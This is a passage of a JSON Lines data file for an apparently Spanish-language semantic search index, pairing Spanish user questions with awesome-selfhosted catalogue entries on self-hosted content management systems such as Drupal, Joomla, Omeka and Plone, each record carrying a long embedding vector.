"que programa puedo usar para gestionar contenido y colaborar con el equipo en la empresa?", "v": [-0.05047, 0.0945, -0.1835, -0.2689, 0.09843, -0.11544, -0.02114, -0.01965, -0.14077, -0.20973, -0.13389, -0.05678, -0.02129, -0.0431, -0.03772, 0.10104, 0.12862, -0.15113, -0.03113, 0.04395, 0.06723, 0.01859, 0.02035, -0.01057, 0.00218, 0.00144, 0.04989, -0.09532, -0.06857, 0.03048, 0.00554, 0.0387, 0.06242, -0.10347, 0.04602, -0.01307, -0.0212, 0.01355, 0.10196, -0.0012, -0.05616, -0.0362, -0.11593, -0.0433, 0.11871, 0.09198, 0.06839, -0.0949, -0.01019, 0.03464, -0.04055, -0.0431, -0.04076, -0.10745, -0.00486, -0.0264, 0.03256, -0.15522, -0.06605, -0.05179, -0.01608, -0.03959, -0.05972, 0.04173, -0.03767, 0.03424, 0.00799, -0.02149, -0.09983, 0.04693, -0.05047, 0.00602, -0.04222, -0.08515, 0.0307, 0.02903, 0.02987, 0.06684, 0.0128, -0.01341, 0.04597, 0.05663, 0.07049, 0.06547, -0.01457, -0.10463, 0.09322, 0.03297, -0.02735, -0.10937, 0.01124, -0.01457, -0.04073, -0.06942, -0.02222, 0.00923, 0.1238, 0.00836, -0.01725, 0.08291, 0.02361, 0.00642, -0.05123, 0.04324, -0.0743, 0.11788, 0.00602, -0.09491, -0.01953, 0.00781, 0.00195, -0.10315, -0.05231, -0.022, -0.10563, 0.00836, -0.01705, -0.08814, -0.00394, -0.05547, -0.05762, -0.05512, 0.0908, 0.0134, 0.14107, -0.05388, 0.07148, 0.14628, 0.00151, -0.00725, -0.0745, 0.03688, -0.04174, 0.0231, -0.09504, -0.01153, -0.05344, 0.05738, 0.001, -0.07043, -0.0289, 0.0651, 0.00463, 0.00764, 0.07431, -0.01503, -0.04214, -0.09797, -0.00912, 0.09652, 0.05637, -0.03943, -0.06786, 0.05718, -0.09369, 0.04492, 0.08469, 0.01007, -0.07706, 0.06924, -0.04771, -0.08043, -0.0509, 0.04576, 0.03562, -0.04128, -0.0284, -0.0213, 0.065, 0.02788, -0.04874, 0.04822, 0.06154, -0.09832, 0.00301, -0.02281, -0.02737, -0.09296, 0.0319, 0.00103, -0.05578, 0.00479, 0.02815, 0.07193, 0.00985, -0.01027, -0.03563, 0.07725, -0.01189, 0.00479, -0.03687, 0.07661, 0.0635, -0.03163, 0.00367, -0.02504, -0.04644, -0.04493, 0.02539, 0.0086, -0.03214, 0.03948, -0.01629, 0.0199, 0.0103, 0.05131, -0.06985, 0.07916, 0.05784, 0.06022, 0.05443, -0.03395, 0.00547, 0.02383, -0.09717, -0.01312, 0.00096, 0.01997, 0.03371, 0.08929, 0.03572, 0.00941, 0.0868, -0.0017, 0.03109, -0.04749, 0.03664, 0.04524, -0.03598, -0.00582, -0.05376, 0.05203, -0.03654, -0.02483, 0.00507, -0.01567, 0.03938, -0.02919, -0.00924, -0.06018, 0.00077, 0.07773, -0.03088, -0.00508, -0.04946, 0.00463, -0.0956, 0.05389, -0.01766, -0.04048, -0.03733, 0.05743, 0.03754, -0.0553, 0.05055, 0.04129]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Alfresco Community Edition β€” The open source Enterprise Content Management software that handles any type of content, allowing users to easily share and collaborate on content [LGPL-3.0, Java]. Apostrophe β€” CMS with a focus on extensible in-context editing tools [MIT, Nodejs]. Automad β€” Flat-file content management system and template engine [MIT, PHP/Docker]. Backdrop CMS β€” Comprehensive CMS for small to medium sized businesses and non-profits [GPL-2.0, PHP]. Bludit β€” Build a site or blog in seconds. Bludit uses flat-files (text files in JSON format) to store posts and pages [⚠, MIT, PHP]. Bolt CMS β€” Content Management Tool, which strives to be as simple and straightforward as possible [MIT, PHP]. CMS Made Simple β€” Faster and easier management of website contents, scalable for small businesses to large corporations [GPL-2.0, PHP]. Cockpit β€” Simple content platform to manage any structured content [MIT, PHP]. Concrete 5 CMS β€” Open source content management system [MIT, PHP].", "indexar": "cual es una alternativa libre a los sistemas de gestiΓ³n de contenidos que manejan cualquier tipo de archivo?", "v": [-0.01329, 0.08368, 0.04627, -0.11276, -0.03456, -0.04811, -0.07351, -0.0647, -0.23181, -0.0672, -0.08881, -0.11619, -0.00205, 0.02875, 0.10379, 0.01155, 0.14952, -0.16141, 0.10073, -0.00102, -0.05151, -0.04266, -0.0111, -0.02886, -0.1259, -0.10851, 0.1169, -0.03605, -0.14261, 0.02735, 0.02347, 0.03645, 0.11183, 0.01495, -0.03596, 0.05817, 0.05598, 0.08673, -0.08783, -0.00119, 0.02231, -0.06829, -0.12253, 0.09654, 0.017, -0.07084, 0.00779, 0.08195, 0.00274, -0.00292, -0.06806, -0.06183, -0.08129, 0.01002, 0.09296, -0.13526, 0.08961, -0.16893, 0.02438, -0.05614, -0.08773, 0.11643, 0.00444, -0.00547, -0.03844, 0.01113, -0.01493, 0.01953, -0.10527, 0.0442, 0.01966, 0.0021, 0.04041, 0.01083, 0.0029, 0.02179, -0.03413, 0.04624, -0.12233, 0.06771, 0.05525, -0.08593, -0.01419, 0.12439, -0.15512, -0.11142, 0.03885, -0.08803, -0.02689, -0.05076, 0.11264, -0.03667, -0.02168, 0.07182, -0.03066, -0.07646, 0.03066, 0.10532, 0.03348, 0.0458, 0.0074, 0.05489, -0.09639, 0.01314, 0.03909, 0.03136, 0.05974, -0.02913, 0.01203, -0.00501, -0.00796, 0.01791, 0.05805, -0.003, -0.0676, -0.00748, -0.01002, 0.01477, 0.01462, -0.05038, -0.08915, -0.08367, 0.01954, -0.0454, 0.09722, -0.03964, 0.04811, 0.09179, -0.05493, 0.02187, 0.01329, -0.00164, -0.11697, -0.01529, -0.04016, -0.05007, 0.05649, 0.04614, 0.02074, -0.03448, -0.0032, 0.04826, -0.00184, 0.03391, 0.10111, -0.04879, 0.02603, -0.08553, -0.03497, -0.06152, -0.05986, -0.0326, -0.02649, 0.06068, -0.06576, 0.07871, -0.00051, -0.11725, -0.07262, 0.07888, -0.00378, 0.02378, 0.01394, 0.0539, -0.05568, -0.02569, -0.0436, -0.02552, -5e-05, -0.03358, -0.02412, 0.08229, 0.0106, -0.08913, -0.01636, -0.09626, -0.10921, -0.15665, 0.05508, -0.01627, -0.07068, 0.00922, -0.01634, 0.04408, -0.05145, -0.06726, -0.01898, -0.01905, -0.0067, 0.06108, 0.00719, 0.02088, -0.07913, -0.03657, -0.00187, -0.01961, -0.08389, -0.02144, 0.00076, 0.03871, -0.08395, -0.00215, -0.01263, -0.03995, -0.04429, 0.03776, -0.02624, -0.00348, 0.0091, 0.04464, 0.04278, 0.01711, 0.07374, -0.04876, -0.03146, -0.00172, 0.05967, 0.00264, 0.00061, -0.05304, 0.05473, 0.0212, 0.07037, -0.01111, -0.00494, 0.01325, 0.05731, 0.03425, -0.01768, -0.03935, -0.03603, 0.033, 0.00378, 0.01968, 0.04261, -0.01674, 0.03562, -0.00604, -0.02416, -0.09812, 0.03858, 0.1165, -0.01923, -0.02367, -0.01947, -0.03828, -0.1369, 0.03012, -0.03227, -0.11387, -0.03944, 0.00859, 0.00872, 0.0143, 0.04547, -0.03274]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Alfresco Community Edition β€” The open source Enterprise Content Management software that handles any type of content, allowing users to easily share and collaborate on content [LGPL-3.0, Java]. Apostrophe β€” CMS with a focus on extensible in-context editing tools [MIT, Nodejs]. Automad β€” Flat-file content management system and template engine [MIT, PHP/Docker]. Backdrop CMS β€” Comprehensive CMS for small to medium sized businesses and non-profits [GPL-2.0, PHP]. Bludit β€” Build a site or blog in seconds. Bludit uses flat-files (text files in JSON format) to store posts and pages [⚠, MIT, PHP]. Bolt CMS β€” Content Management Tool, which strives to be as simple and straightforward as possible [MIT, PHP]. CMS Made Simple β€” Faster and easier management of website contents, scalable for small businesses to large corporations [GPL-2.0, PHP]. Cockpit β€” Simple content platform to manage any structured content [MIT, PHP]. Concrete 5 CMS β€” Open source content management system [MIT, PHP].", "indexar": "con que herramienta puedo montar un blog o sitio web de forma muy rΓ‘pida usando archivos simples?", "v": [0.01637, 0.10262, -0.19549, -0.15105, -0.14673, -0.10184, -0.07712, -0.02353, -0.0886, -0.12184, -0.10201, -0.11676, 0.03669, -0.01282, 0.08914, 0.04147, 0.12708, -0.11977, 0.06926, -0.04078, -0.04531, -0.02151, -0.10968, -0.0607, -0.04527, -0.09, 0.0575, 0.02678, -0.20624, 0.07048, -0.00091, 0.09691, 0.04289, 0.07517, -0.1257, -0.03715, 0.06034, 0.0405, -0.02079, -0.02323, -0.09009, -0.04576, -0.0877, 0.08872, -0.06538, 0.04653, -0.0124, -0.10822, -0.04755, 0.00262, 0.08653, -0.14611, -0.12066, 0.04997, -0.06611, -0.07815, 0.18857, -0.20532, 0.05761, -0.05785, -0.03765, 0.15802, -0.03707, 0.02798, -0.06886, 0.00623, 0.00752, 0.03085, -0.1055, 0.00574, 0.04598, -0.07672, 0.06257, -0.09293, 0.06126, 0.02022, 0.02558, 0.02191, 0.03456, 0.0401, 0.0475, -0.07726, -0.03961, 0.01442, -0.07322, -0.04702, 0.03096, -0.0839, -0.02815, -0.07021, 0.05649, 0.03219, -0.005, -0.02867, -0.05643, -0.0799, 0.05576, 0.01212, 0.03099, -0.11414, 0.00237, 0.02094, -0.06711, 0.09517, 0.09376, 0.03088, 0.04358, -0.01301, -0.05794, -0.09366, 0.11676, 0.04416, -0.05538, 0.02381, -0.07875, 0.03597, 0.01861, -0.05027, -0.02902, -0.07688, 0.01797, 0.05936, -0.10158, -0.03716, 0.0172, -0.04768, 0.04746, 0.0637, -0.10195, -0.059, -0.00796, -0.04499, -0.07927, 0.02694, 0.04397, 0.00505, 0.04831, -0.0099, -0.01297, -0.07541, 0.07852, -0.05582, -0.07298, -0.07756, 0.03929, -0.03459, 0.01438, -0.04388, -0.06422, -0.02726, -0.03053, 0.05732, -0.00737, -0.03743, -0.08327, -0.05386, -0.02654, -0.02273, -0.04182, 0.05599, -0.10901, 0.03259, 0.07346, 0.02813, -0.00658, -0.05607, 0.00197, 0.07223, 0.03635, 0.03209, 0.00661, 0.06491, 0.00348, -0.03761, 0.04401, 0.04884, -0.08226, 0.00016, 0.04083, -0.03038, 0.00568, -0.02357, -0.07412, 0.05014, -0.02566, -0.00313, 0.11788, 0.04284, -0.02685, 0.06267, 0.02746, -0.02721, -0.03487, -0.01217, 0.02677, 0.03486, -0.04697, -0.0257, 0.05196, -0.0614, -0.02418, -0.07577, 0.00459, -0.02051, -0.0318, 0.00807, -0.02402, -0.04439, 0.01835, 0.03507, 0.02776, -0.03591, 0.01495, -0.08299, 0.04052, -0.01806, 0.02742, 0.00437, -0.02059, -0.00697, 0.06379, 0.03531, 0.03776, 0.03939, 0.02164, 0.04067, -0.02691, -0.01071, -0.0139, 0.01314, -0.03759, -0.05065, -0.04468, -0.05568, 0.02052, -0.04855, 0.03034, 0.01309, -0.08262, 0.01953, 0.00095, 0.01076, 0.05086, 0.02368, -0.0342, -0.05229, -0.02588, 0.01244, -0.01398, -0.07818, 0.00427, -0.00942, 0.02884, -0.03964, -0.01871, 0.0072]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Contao β€” Powerful CMS that allows you to create professional websites and scalable web applications [LGPL-3.0, PHP]. CouchCMS β€” CMS for designers [CPAL-1.0, PHP]. Drupal β€” Advanced open source content management platform [GPL-2.0, PHP]. eLabFTW β€” Online lab notebook for research labs. Store experiments, use a database to find reagents or protocols, use trusted timestamping to legally timestamp an experiment, export as pdf or zip archive, share with collaborators… [AGPL-3.0, PHP]. Expressa β€” Content Management System for powering database driven websites using JSON schemas. Provides permission management and automatic REST APIs [MIT, Nodejs]. Joomla! β€” Advanced Content Management System (CMS) [GPL-2.0, PHP]. KeystoneJS β€” CMS and web application platform [MIT, Nodejs]. Localess β€” Powerful translation management and content management system. Manage and translate your website or app content into multiple languages, using AI to translate faster [⚠, MIT, Docker].", "indexar": "que programa me sirve para crear sitios web profesionales de forma escalable?", "v": [0.00214, 0.04602, -0.19632, -0.16725, 0.01721, -0.19684, -0.00153, -0.1488, -0.07187, -0.15467, 0.00929, -0.06107, 0.03508, -0.15389, 0.11034, -0.00439, 0.04878, -0.12049, 0.10499, 0.00746, -0.00657, -0.02447, -0.02819, -0.01569, -0.09586, -0.07715, 0.04431, -0.07973, -0.08006, 0.06146, 0.07277, 0.07275, -0.05046, -0.08488, 0.0643, -0.02165, 0.04042, -0.03651, -0.07517, 0.00633, -0.01382, -0.02676, -0.04406, 0.05926, 0.00937, 0.06075, -0.02622, -0.04096, -0.01178, 0.04816, -0.03675, -0.02228, -0.04392, -0.06037, 0.06109, -0.09577, 0.08066, -0.16025, 2e-05, -0.01548, -0.05988, 0.02548, -0.0379, -0.07749, 0.03932, -0.01338, 0.08003, 0.03872, -0.08434, -0.05651, -0.10908, -0.03117, 0.15943, -0.09295, 0.11318, 0.00586, -0.0112, 0.00935, 0.0186, -0.06329, 0.06462, -0.00639, -0.06017, 0.03065, -0.09149, 0.03611, -0.03239, -0.03994, 0.01392, -0.03759, 0.08691, 0.05828, 0.01709, 0.00227, -0.03384, -0.13744, 0.11351, 0.00646, 0.06713, 0.07106, 0.0182, -0.07774, -0.08244, 0.06535, -0.0077, 0.13295, 0.07142, -0.05473, -0.06783, 0.02895, 0.04079, 0.04011, -0.05001, -0.03362, -0.11429, -0.00605, 0.04228, -0.00331, 0.0113, -0.04378, -0.04889, 0.0026, -0.04995, 0.07384, 0.00992, 0.03736, -0.03138, 0.06209, -0.07052, 0.05001, -0.01968, -0.01254, -0.07605, -0.00037, 0.00075, -0.01874, 0.0777, 0.00965, 0.07182, -0.07886, 0.01913, 0.08134, -0.06783, -0.03399, -0.04056, -0.02445, 0.02428, -0.12468, -0.04884, 0.04566, -0.0835, 0.12508, -0.04012, 0.04092, -0.12409, -0.04546, -0.04631, -0.00887, -0.09078, 0.04747, -0.05735, 0.07061, 0.0511, -0.03262, 0.04404, 0.02346, -0.05234, 0.10392, 0.13552, 0.07934, -0.03663, 0.07506, 0.02308, -0.13673, 0.05035, 0.06939, -0.0735, -0.07941, 0.0461, -0.0307, -0.0553, -0.03508, 0.02502, 0.05532, -0.04067, -0.0496, 0.05254, -0.01685, -0.06101, 0.04475, -0.0583, 0.00301, -0.03018, -0.00057, 0.03091, -0.01659, 0.00657, -0.00745, 0.07237, -0.06523, -0.03745, -0.10749, 0.00813, -0.01214, -0.03339, 0.06851, -0.02065, -0.03371, 0.01421, 0.1108, 0.01427, -0.07001, 0.00685, -0.05992, 0.05619, -0.0643, 0.05853, 0.02215, 0.01034, 0.04114, 0.01405, -0.03653, -0.05186, 0.05849, 0.02428, -0.05941, 0.00266, 0.00309, 0.01827, -0.00997, 0.00151, -0.07323, 0.00141, -0.03439, 0.01179, -0.0224, 0.01688, 0.00917, -0.03633, -0.06484, -0.03743, 0.04596, -0.02937, -0.03165, 0.03339, -0.08587, -0.05238, -0.00316, 0.02755, 0.00686, -0.10683, -0.00661, 0.01841, 0.00486, 0.03056, 0.05784]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Contao β€” Powerful CMS that allows you to create professional websites and scalable web applications [LGPL-3.0, PHP]. CouchCMS β€” CMS for designers [CPAL-1.0, PHP]. Drupal β€” Advanced open source content management platform [GPL-2.0, PHP]. eLabFTW β€” Online lab notebook for research labs. Store experiments, use a database to find reagents or protocols, use trusted timestamping to legally timestamp an experiment, export as pdf or zip archive, share with collaborators… [AGPL-3.0, PHP]. Expressa β€” Content Management System for powering database driven websites using JSON schemas. Provides permission management and automatic REST APIs [MIT, Nodejs]. Joomla! β€” Advanced Content Management System (CMS) [GPL-2.0, PHP]. KeystoneJS β€” CMS and web application platform [MIT, Nodejs]. Localess β€” Powerful translation management and content management system. Manage and translate your website or app content into multiple languages, using AI to translate faster [⚠, MIT, Docker].", "indexar": "cual es una herramienta que combine gestiΓ³n de contenido con APIs automΓ‘ticas en JSON?", "v": [0.0009, 0.07018, 0.0048, -0.18964, 0.01533, -0.09703, -0.00831, -0.07111, -0.18518, 0.00448, -0.09167, -0.07936, -0.04431, 0.03166, 0.11802, 0.03444, 0.14201, -0.17453, -0.03023, 0.16956, -0.02889, 0.05247, -0.0821, -0.0728, -0.02711, 0.04165, 0.18403, -0.03206, -0.24952, -0.02682, -0.01613, -0.01386, 0.06222, -0.01367, -0.09593, -0.11718, -0.12949, 0.18973, -0.06693, 0.10419, 0.00897, -0.05176, -0.1602, 0.04532, -0.00798, 0.15449, 0.07842, 0.07009, 0.03056, -0.00105, -0.06539, -0.09034, -0.13185, 0.03878, 0.01876, -0.1003, 0.12856, -0.07114, 0.00122, -0.07379, -0.06772, -0.0109, -0.09539, -0.05744, -0.04337, 0.00138, 0.06089, -0.10271, -0.00788, 0.17472, 0.02198, -0.06707, 0.00311, 0.0023, 0.04284, 0.01891, 0.053, 0.0786, 0.0095, 0.06623, 0.07323, -0.0683, -0.03152, 0.0296, 0.02804, -0.05836, -0.02454, -0.07203, 0.0024, -0.01731, -0.06445, -0.12885, 0.03825, 0.05319, 0.04186, 0.0028, 0.08256, -0.0672, -0.01634, 0.02061, 0.08114, -0.0741, -0.12071, 0.06325, 0.02564, 0.07372, 0.04565, -0.05664, -0.00177, -0.03413, 0.07588, 0.07725, -0.02799, -0.03027, -0.01693, 0.07105, -0.02292, -0.04953, -0.00519, -0.07304, 0.00909, -0.04446, -0.02679, -0.07207, 0.02697, 0.05281, -0.03221, 0.11995, -0.00546, -0.04523, -0.00701, -0.03308, -0.06228, 0.02845, 0.03533, 0.08723, 0.08756, -0.04723, -0.01765, -0.04103, -0.07999, 0.02399, 0.01244, -0.06093, 0.08509, -0.06677, 0.04274, -0.03096, 0.00598, 0.0432, 0.00116, -0.10746, 0.02871, 0.04149, -0.04676, 0.0358, -0.03076, 0.0189, -0.0975, 0.02923, -0.01983, -0.02661, 0.00559, 0.05941, 0.03368, 0.01923, 0.02991, -0.00948, 0.035, -0.00373, 0.03058, 0.03292, 7e-05, 0.00174, -0.03024, -0.03737, -0.0543, 0.00838, 0.01468, -0.0868, -0.06556, -0.05287, -0.03545, -0.00195, 0.03537, -0.06781, -0.00326, -0.04912, 0.02487, -0.01196, -0.03179, 0.03969, 0.03892, -0.03419, 0.05698, -0.00494, -0.03894, -0.04409, -0.0109, -0.00448, -0.07157, 0.00062, 0.01682, -0.06105, -0.05774, 0.05053, -0.01695, -0.00328, -0.02104, 0.01195, 0.03727, 0.05203, 0.02067, -0.04899, -0.00627, -0.0214, -0.03796, -0.01797, -0.04039, 0.0052, 0.01608, -8e-05, 0.02083, -0.0308, 0.02889, 0.04166, 0.02034, 0.06182, 0.03839, -0.0125, -0.01441, 0.00824, -0.03184, -0.00819, 0.03655, -0.02558, 0.03214, -0.0213, -0.02348, -0.03572, -0.0098, 0.03921, 0.00682, -0.05986, -0.02703, -0.04628, -0.05591, 0.00524, -0.0153, -0.07747, -0.03112, 0.02208, 0.04851, -0.01702, 0.03972, -0.05202]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Contao β€” Powerful CMS that allows you to create professional websites and scalable web applications [LGPL-3.0, PHP]. CouchCMS β€” CMS for designers [CPAL-1.0, PHP]. Drupal β€” Advanced open source content management platform [GPL-2.0, PHP]. eLabFTW β€” Online lab notebook for research labs. Store experiments, use a database to find reagents or protocols, use trusted timestamping to legally timestamp an experiment, export as pdf or zip archive, share with collaborators… [AGPL-3.0, PHP]. Expressa β€” Content Management System for powering database driven websites using JSON schemas. Provides permission management and automatic REST APIs [MIT, Nodejs]. Joomla! β€” Advanced Content Management System (CMS) [GPL-2.0, PHP]. KeystoneJS β€” CMS and web application platform [MIT, Nodejs]. Localess β€” Powerful translation management and content management system. Manage and translate your website or app content into multiple languages, using AI to translate faster [⚠, MIT, Docker].", "indexar": "necesito un sistema para traducir el contenido de mi aplicaciΓ³n usando inteligencia artificial.", "v": [0.03179, 0.13362, -0.15935, -0.21142, 0.13583, -0.09597, -0.16625, -0.04238, -0.16998, 0.09712, -0.04974, -0.12561, -0.10261, 0.03072, 0.00099, -0.08383, 0.08607, -0.13875, 0.00676, -0.0005, 0.01804, -0.05245, -0.12131, -0.10963, -0.04117, 0.07222, -0.07422, 0.03192, -0.0717, -0.0349, -0.13509, -0.03441, 0.10121, -0.06727, -0.14509, -0.12791, -0.04344, 0.04901, 0.03389, 0.00881, 0.10967, 0.04189, -0.03534, 0.11017, 0.04314, 0.05414, 0.05188, -0.08815, -0.04866, 0.05565, -0.0902, -0.07034, -0.02886, -0.01827, -0.00078, -0.13422, 0.10796, -0.12384, 0.0055, -0.05186, -0.0648, -0.03051, 0.00712, 0.08516, 0.03205, 0.01777, -0.0085, 0.03961, -0.08532, 0.04238, -0.02777, -0.00959, -0.0423, 0.07364, -0.00767, 0.06805, -0.00955, -0.07491, 0.06092, 0.00753, -0.09319, -0.0262, -0.04306, 0.00697, 0.09562, -0.04187, 0.08998, -0.01903, 0.0772, -0.04155, -0.08595, -0.06471, 0.05441, -0.01542, 0.14166, 0.03994, 0.00163, -0.03013, -0.03493, 0.0992, 0.03408, -0.13274, -0.0503, 0.06387, -0.1338, 0.04935, 0.0362, -0.06318, 0.00112, -0.04383, 0.0433, -0.04624, -0.002, -0.01115, -0.03084, 0.04589, 0.04733, 0.01852, 0.01921, 0.01032, -0.1036, 0.00736, 0.03781, -0.09025, 0.07413, -0.07259, -0.02519, 0.07326, 0.04148, -0.04107, 0.01344, -0.10944, -0.07719, -0.07127, 0.03008, 0.03617, 0.07181, -0.02103, -0.04678, 0.05493, -0.10008, 0.00999, -0.03289, -0.0808, 0.02313, 0.02488, 0.04421, -0.02433, 0.03233, -0.01613, 0.00874, -0.06833, -0.03838, -0.02324, -0.03472, -0.03215, 0.00439, -0.09452, -0.04431, -0.00985, 0.01125, -0.05798, -0.00602, 0.02512, -0.03415, -0.00696, 0.05591, -0.01974, 0.04965, 0.09614, -0.01881, 0.02303, 0.03818, -0.05578, 0.01901, 0.00068, -0.01088, 0.03813, -0.00083, -0.07865, -0.03066, -0.04248, 0.0635, -7e-05, 0.01308, -0.02221, -0.02389, -0.01787, -0.02583, 0.01024, -0.00619, 0.02068, 0.01253, 0.0265, 0.11101, -0.01829, -0.0484, -0.0684, -0.02177, -0.00645, -0.02416, 0.08103, 0.00798, -0.02379, -0.05347, 0.09839, 0.10591, -0.00413, -0.02664, 0.0409, -0.04286, 0.014, 0.02995, 0.05575, 0.02319, 0.02408, -0.0284, 0.024, -0.01449, -0.06023, -0.01274, -0.02728, -0.04008, 0.07017, -0.04192, -0.00272, 0.02161, 0.06271, -0.04319, -0.03934, -0.02549, -0.02085, 0.0233, -0.02806, 0.01174, -0.04142, -0.06139, 0.01508, -0.04807, -0.08657, -0.04503, 0.0853, 0.00731, -0.03207, -0.06499, -0.0316, -0.07273, -0.04805, -0.03611, -0.10164, -0.05269, 0.03207, 0.06411, -0.09227, 0.0387, 0.0213]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): MODX β€” Advanced content management and publishing platform. The current version is called 'Revolution' [GPL-2.0, PHP]. Neos β€” Neos or TYPO3 Neos (for version 1) is a modern, open source CMS [GPL-3.0, PHP]. Noosfero β€” Platform for social and solidarity economy networks with blog, e-Portfolios, CMS, RSS, thematic discussion, events agenda and collective intelligence for solidarity economy in the same system [AGPL-3.0, Ruby]. Omeka β€” Create complex narratives and share rich collections, adhering to Dublin Core standards with Omeka on your server, designed for scholars, museums, libraries, archives, and enthusiasts [GPL-3.0, PHP]. Payload CMS β€” Developer-first headless CMS and application framework [MIT, Nodejs]. Pimcore β€” Multi-channel experience and engagement management platform [GPL-3.0, PHP/Docker]. Plone β€” Powerful open-source CMS system [ZPL-2.0, Python/Docker]. Publify β€” Simple but full featured web publishing software [MIT, Ruby].", "indexar": "que programa es mejor para crear contenido complejo y compartir colecciones en museos o bibliotecas?", "v": [0.23743, 0.02855, -0.08074, -0.11233, 0.02144, -0.19271, 0.05442, 0.01687, -0.11959, -0.24166, -0.06224, -0.01993, -0.04502, -0.03521, 0.03593, -0.08505, 0.10346, -0.17609, 0.06399, 0.01904, 0.09544, 0.0519, -0.05242, -0.02254, 0.04008, -0.06953, 0.0833, -0.04898, 0.01265, 0.17786, 0.01351, 0.01578, 0.036, -0.07033, 0.03011, -0.11786, 0.05258, -0.01708, -0.10319, -0.07411, 0.00109, 0.06736, -0.04996, 0.05626, -0.07065, -0.07701, 0.01643, 0.04075, -0.03943, -0.02357, -0.04028, 0.05798, -0.05134, 0.06209, 0.14961, -0.12349, 0.01439, -0.00914, 0.02714, 0.05426, -0.00488, 0.08605, 0.0448, -0.04105, 0.04476, -0.05991, -0.00775, 0.00746, -0.07399, 0.04364, -0.12399, -0.06244, 0.02182, 0.02576, -0.00558, 0.11199, -0.01385, -0.12491, -0.00978, -0.03327, 0.02218, -0.03929, 0.06562, 0.01643, -0.04458, -0.0321, 0.04269, -0.08282, 0.02023, -0.05429, -0.05414, -0.03548, -0.09113, -0.00095, 0.05344, -0.04693, 0.08912, 0.03216, 0.08961, 0.09934, -0.03692, 0.00937, -0.01299, 0.03098, -0.0738, 0.08668, 0.03831, -0.02824, 0.05965, -0.029, -0.03207, -0.03144, 0.02111, -0.10674, -0.03001, 0.05726, 0.01477, -0.0063, 0.06735, 0.04947, -0.11584, -0.0499, -0.04766, -0.07954, 0.01172, 0.02996, -0.00705, 0.02077, 0.00828, -0.00251, -0.06956, 0.05145, -0.04943, -0.03994, -0.06188, -0.00444, 0.00676, -0.02003, -0.01628, -0.09477, 0.01214, 0.02105, 0.04223, 0.02, 0.01288, -0.0542, 0.06581, -0.03172, 0.00737, 0.02366, -0.06542, -0.03238, 0.13127, -0.04942, -0.00601, 0.13348, 0.02059, -0.13007, 0.01055, 0.0485, -0.04022, 0.04244, 0.05149, -0.07047, 0.00358, -0.07446, -0.03298, 0.00075, 0.12038, -0.00273, -0.02177, 0.03965, -0.04952, -0.08682, -0.02761, -0.0019, -0.05443, -0.09755, 0.04262, 0.01947, -0.14476, -0.03668, 0.01742, -0.07792, -0.0625, -0.10601, -0.00992, 0.02699, -0.00562, -0.00952, -0.05116, 0.03838, -0.02075, 0.02904, 0.09749, -0.00071, -0.01987, 0.04694, 0.06084, 0.03982, 0.011, 0.03962, -0.02008, -0.03364, 0.00052, 0.06132, -0.09661, 0.03122, 0.05198, 0.03842, 0.0394, 0.01735, 0.01088, -0.07145, -0.07058, -0.00659, -0.07211, 0.06567, -0.01456, -0.02898, 0.0574, 0.01123, 0.04094, -0.00664, 0.09729, -0.00944, 0.00768, 0.03939, 0.10635, 0.00635, 0.01967, -0.02502, -0.01043, -0.04749, 0.03897, 0.00505, 0.02479, 0.04475, -0.01863, -0.05647, -0.01595, 0.07979, -0.03008, -0.01552, 0.03065, -0.0506, -0.07686, 0.06929, -0.00304, -0.0879, -0.00568, 0.00863, 0.02241, -0.06145, 0.06329, -0.06914]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): MODX β€” Advanced content management and publishing platform. The current version is called 'Revolution' [GPL-2.0, PHP]. Neos β€” Neos or TYPO3 Neos (for version 1) is a modern, open source CMS [GPL-3.0, PHP]. Noosfero β€” Platform for social and solidarity economy networks with blog, e-Portfolios, CMS, RSS, thematic discussion, events agenda and collective intelligence for solidarity economy in the same system [AGPL-3.0, Ruby]. Omeka β€” Create complex narratives and share rich collections, adhering to Dublin Core standards with Omeka on your server, designed for scholars, museums, libraries, archives, and enthusiasts [GPL-3.0, PHP]. Payload CMS β€” Developer-first headless CMS and application framework [MIT, Nodejs]. Pimcore β€” Multi-channel experience and engagement management platform [GPL-3.0, PHP/Docker]. Plone β€” Powerful open-source CMS system [ZPL-2.0, Python/Docker]. Publify β€” Simple but full featured web publishing software [MIT, Ruby].", "indexar": "con quΓ© puedo montar una plataforma de gestiΓ³n de contenidos que funcione sin 